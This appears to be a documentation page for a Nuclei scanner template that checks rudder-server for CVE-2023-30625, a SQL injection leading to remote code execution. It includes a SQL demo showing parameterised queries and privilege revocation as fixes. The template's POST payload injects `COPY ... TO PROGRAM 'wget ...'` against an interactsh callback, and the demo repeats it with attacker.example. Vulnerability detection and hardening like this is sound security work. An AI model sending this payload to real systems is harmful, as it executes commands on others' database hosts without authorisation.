Rudder Server < 1.3.0-rc.1 - SQL Injection
ID: CVE-2023-30625
Severity: high
Author: gy741
Tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli
Description
Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection; the template below reaches it through the `source_id` field of the JSON body posted to `/v1/warehouse/pending-events`. The issue can lead to Remote Code Execution (RCE) because the `rudder` role in PostgreSQL has superuser permissions by default, and a PostgreSQL superuser can run operating-system commands on the database host with `COPY ... TO PROGRAM`, which is what the injected statement does. Version 1.3.0-rc.1 contains patches for this issue.
YAML Source

```yaml
id: CVE-2023-30625

info:
  name: Rudder Server < 1.3.0-rc.1 - SQL Injection
  author: gy741
  severity: high
  description: |
    Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625
    - http://packetstormsecurity.com/files/173837/Rudder-Server-SQL-Injection-Remote-Code-Execution.html
    - https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30
    - https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-30625
    cwe-id: CWE-89
    epss-score: 0.94887
    epss-percentile: 0.99286
    cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rudderstack
    product: rudder-server
  tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli

variables:
  cmd: "wget {{interactsh-url}}"

http:
  - raw:
      - |
        POST /v1/warehouse/pending-events HTTP/1.1
        Host: {{Hostname}}

        {"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "error getting pending"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 500
# digest: 4b0a004830460221008ed82831c35c7cf055873415132a9db9e51a73872c29e2e9c7fcd21cb38e2fe0022100a1bba7490a5e1774773cbf1cffb00e7dc71ff1c82ba56575c12c9f675290dd2f:922c64590222798bb761d5b6d8e72950
```
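What the template's payload turns into once it reaches PostgreSQL, how to check whether the database role has the privilege that turns this injection into RCE, and how a parameterised query neutralises the same input, as an added example that is not part of the original template or of rudder-server's code. Run it in psql as a superuser against a scratch database on PostgreSQL 11 or later. The table `wh_pending_events`, its rows, the callback host `attacker.example` and the prepared-statement name `pending` are constructed for this demo; the role name `rudder` is the one the advisory names, and the ALTER/REVOKE statements assume that role exists.

```sql
-- Added demo, not rudder-server code. Table and rows are constructed.
CREATE TEMP TABLE wh_pending_events (source_id text, event_count int);
INSERT INTO wh_pending_events VALUES ('src_ok', 3);

-- 1. What naive string interpolation of the request body produces. format()
--    only splices the payload into the query text; the result is shown, not
--    executed. Note the second statement and the trailing quote killed by "--".
SELECT format($q$SELECT event_count FROM wh_pending_events WHERE source_id = '%s'$q$,
              $p$test'; copy (SELECT '') to program 'wget http://attacker.example'-- - $p$)
       AS injected_statement;
-- -> SELECT event_count FROM wh_pending_events WHERE source_id = 'test'; copy (SELECT '') to program 'wget http://attacker.example'-- - '

-- 2. COPY ... TO PROGRAM is only allowed for superusers or members of the
--    pg_execute_server_program role. If either column is true for the
--    application role, the injection is an RCE on the database host.
SELECT rolname,
       rolsuper,
       pg_has_role(rolname, 'pg_execute_server_program', 'MEMBER') AS can_copy_to_program
FROM pg_roles
WHERE rolname = 'rudder';

-- 3. The same payload passed as a bind parameter is compared as data:
--    it matches no row and never reaches the parser as SQL.
PREPARE pending(text) AS
  SELECT source_id, event_count FROM wh_pending_events WHERE source_id = $1;
EXECUTE pending($p$test'; copy (SELECT '') to program 'wget http://attacker.example'-- - $p$);  -- 0 rows
EXECUTE pending('src_ok');                                                                     -- 1 row
DEALLOCATE pending;

-- 4. Defence in depth independent of the application patch: strip the
--    privilege that makes COPY TO PROGRAM possible (assumes role 'rudder' exists).
ALTER ROLE rudder NOSUPERUSER;
REVOKE pg_execute_server_program FROM rudder;
```

Step 4 reduces the injection from RCE to data access; it does not remove the SQL injection itself, so it complements rather than replaces upgrading to 1.3.0-rc.1. Re-run the query in step 2 afterwards and expect both flags to read false.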
Guide to check the vulnerabilities
This is a Nuclei template for CVE-2023-30625. It sends a single POST request whose `source_id` value closes the string literal and appends a `COPY ... TO PROGRAM` statement that runs `wget` against an interactsh callback host. A target is reported vulnerable only when all three matchers hold (`matchers-condition: and`): the response is HTTP 500, its body contains "error getting pending", and interactsh records a DNS interaction from the target, which is the database host resolving the callback name. Because the check executes a real command on the database server and depends on that server having outbound DNS resolution, run it only against systems you are authorised to test, and treat a 500 with no callback as inconclusive rather than as proof the target is patched.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30625.yaml"